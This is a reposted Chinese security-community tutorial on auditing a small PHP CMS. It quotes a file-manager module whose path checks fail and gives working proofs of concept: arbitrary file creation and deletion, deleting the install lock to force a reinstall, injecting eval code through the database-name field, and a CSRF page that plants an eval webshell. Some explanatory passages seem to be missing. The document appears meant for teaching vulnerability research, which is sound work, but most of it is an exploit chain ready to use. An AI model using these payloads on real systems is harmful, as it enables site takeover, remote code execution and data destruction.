文章来源:先知社区(ajie)
原文地址:https://xz.aliyun.com/t/10539
https://github.com/search?q=cms
https://search.gitee.com/?skin=rec&type=repository&q=cms
https://down.chinaz.com/
https://www.a5xiazai.com/
......
1、找最新版的版本较低的,例如1.1、1.2
2、找github star不多的
3、找源码总容量小的
4、尽量不要找使用tp、yii、laravel等框架型CMS
这里说一下理由:
扯了那么多,总结一句话:
跟挖SRC一样,如果你一开始就瞄着阿里SRC、百度SRC等来挖掘,一直挖不到洞,是不是心态崩了呢;如果你一开始借助nday的poc,结合fofa搜集资产,一下子就能挖到简单、小型企业的漏洞,虽然可能漏洞奖金不多、但是满满的成就感有没有~
代码审计也是一样的,一开始就找框架型的,MVC架构的CMS,不仅可能看不懂代码,还可能连路由都弄不懂呢。所以一开始还是找些简单的练练手比较好~
https://github.com/chaitin/xray/releases
这个其实是很有搞头的,这里没有详细说是因为当时确实重心在白盒上,
实际上我感觉这个发现漏洞再去找对应的代码,会更加有趣些
./xray_darwin_amd64 webscan --listen 127.0.0.1:7777 --html-output test.html
$path = realpath($_GET['path']);
if (!$path) {
if (!InArray('edit,save,del,mkdir,mkfile', $type) && !$_G['GET']['JSON']) {
PkPopup('{content:"不存在的路径,请求路径:' . $_GET['path'] . '",icon:2,shade:1,hideclose:1,submit:function(){location.href="index.php?c=app&a=filesmanager:index&path="}}');
}
ExitJson('不存在的路径,请求路径:' . $_GET['path']);
}
$_G['TEMP']['PATH'] = iconv('GBK', 'UTF-8//IGNORE', $path);
if (strpos($path, $spath) !== 0) {
if (!InArray('edit,save,del,mkdir,mkfile', $type) && !$_G['GET']['JSON']) {
PkPopup('{content:"越权操作,请求路径:' . $_GET['path'] . '",icon:2,shade:1,hideclose:1,submit:function(){location.href="index.php?c=app&a=filesmanager:index&path="}}');
}
ExitJson('越权操作,请求路径:' . $_GET['path']);
}
switch ($type) {
case 'edit' :
if (filetype($path) != 'file') {
if ($_G['GET']['JSON']) {
ExitJson('不存在的文件');
}
PkPopup('{content:"不存在的文件",icon:2,shade:1,hideclose:1,submit:function(){location.href="index.php?c=app&a=filesmanager:index&path="}}');
}
$suffix = substr($path, strrpos($path, '.') + 1);
if (!InArray($suffixs, $suffix)) {
if ($_G['GET']['JSON']) {
ExitJson('不支持的文件格式');
}
PkPopup('{content:"不支持的文件格式",icon:2,shade:1,hideclose:1,submit:function(){location.href="index.php?c=app&a=filesmanager:index&path="}}');
}
$filecontent1 = file_get_contents($path);
$filecontent = htmlspecialchars($filecontent1, ENT_QUOTES);
if ($filecontent1 && !$filecontent) {
if ($_G['GET']['JSON']) {
ExitJson('不支持该文件编码,仅支持UTF-8');
}
PkPopup('{content:"不支持该文件编码,仅支持UTF-8",icon:2,shade:1,hideclose:1,submit:function(){location.href="index.php?c=app&a=filesmanager:index&path="}}');
}
if ($_G['GET']['JSON']) {
ExitJson($filecontent1, TRUE);
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
$path = '';
for ($i = 0; $i < count($paths); $i++) {
if ($i == count($paths) - 1) {
$filename = $paths[$i];
} else {
$path .= $paths[$i] . '/';
}
}
ExitGourl('index.php?c=app&a=filesmanager:index&path=' . urlencode(realpath($path)) . '&editbtn=' . md5($filename));
break;
2)往下看,对$path进行unlink(),即删除操作
case 'del' :
$r = unlink($path);
ExitJson('操作完成', $r);
break;
case 'mkfile' :
$mkname = $_GET['mkname'];
if (!$mkname) {
ExitJson('请输入目录或文件的名称');
}
if ($type == 'mkdir') {
if (file_exists($path . "/{$mkname}")) {
ExitJson('目录已存在');
}
$r = mkdir($path . "/{$mkname}");
} else {
if (file_exists($path . "/{$mkname}")) {
ExitJson('文件已存在');
}
$r = file_put_contents($path . "/{$mkname}", '');
}
ExitJson('操作完成', $r === FALSE ? FALSE : TRUE);
break;
}
/index.php?c=app&a=puyuetianeditor:index&s=myfiles&page=1
通过a=puyuetianeditor:index,
定位文件位置为/app/puyuetianeditor/index.php
4)漏洞路径/app/filesmanager/index.php即可以对应URL
/?c=app&a=filesmanager:index
http://127.0.0.1/index.php?c=app&a=filesmanager:index&type=mkfile&mkname=123.php
http://127.0.0.1/index.php?c=app&a=filesmanager:index&type=save&path=123.php
POST:
filecontent=<?php phpinfo();?>
任意文件删除
poc:
http://127.0.0.1/index.php?c=app&a=filesmanager:index&type=del&path=123.php
http://192.168.150.9/index.php?c=app&a=filesmanager:index&type=del&path=C://phpStudy/WWW/install/install.locked
POST /install/index.php?step=3 HTTP/1.1
Host: 192.168.150.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 302
Origin: http://192.168.150.9
Connection: close
Referer: http://192.168.150.9/install/index.php?step=2
Cookie: PHPSESSID=b9imt0v97o8hsml01jr0tro9n3; UIA=KXoyLywxNlo2YDQtLl8tX2BlMjAqLzUqX103Y1xlZWBcMzFeXi4xXjQsYDBeMC8tZDEsXjIxMCoxLjIvXmQ1Y14w; app_puyuetianeditor_editcontent=%3Cbr%3E
_webos=*&mysql_type=mysql&mysql_location=127.0.0.1&mysql_username=root&mysql_password=root&mysql_database='eval($_REQUEST[1])&mysql_prefix=pk_&mysql_charset=set+names+utf8&adminusername=phpinfo();&adminpassword=phpinfo();&adminemail=admin%40qq.com&hs_username=&hs_password=&hs_domain=192.168.150.9
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form id='test1' action="http://192.168.150.9/index.php">
<input type="hidden" name="c" value="app" />
<input type="hidden" name="a" value="filesmanager:index" />
<input type="hidden" name="type" value="mkfile" />
<input type="hidden" name="mkname" value="123.php" />
<input type="submit" value="Submit request" />
</form>
<form id='test2' action="http://192.168.150.9/index.php?c=app&a=filesmanager:index&type=save&path=123.php" method="POST">
<input type="hidden" name="filecontent" value="<?php eval($_REQUEST[1]);?>" />
<input type="submit" value="Submit request" />
</form>
<script>
function test1() {
document.getElementById("test1").submit();
}
function test2() {
document.getElementById("test2").submit();
}
setTimeout(test1,100)
setTimeout(test2,200)
</script>
</body>
</html>
6)在已登录的浏览器中打开test.html文件
推荐阅读:
点赞,转发,在看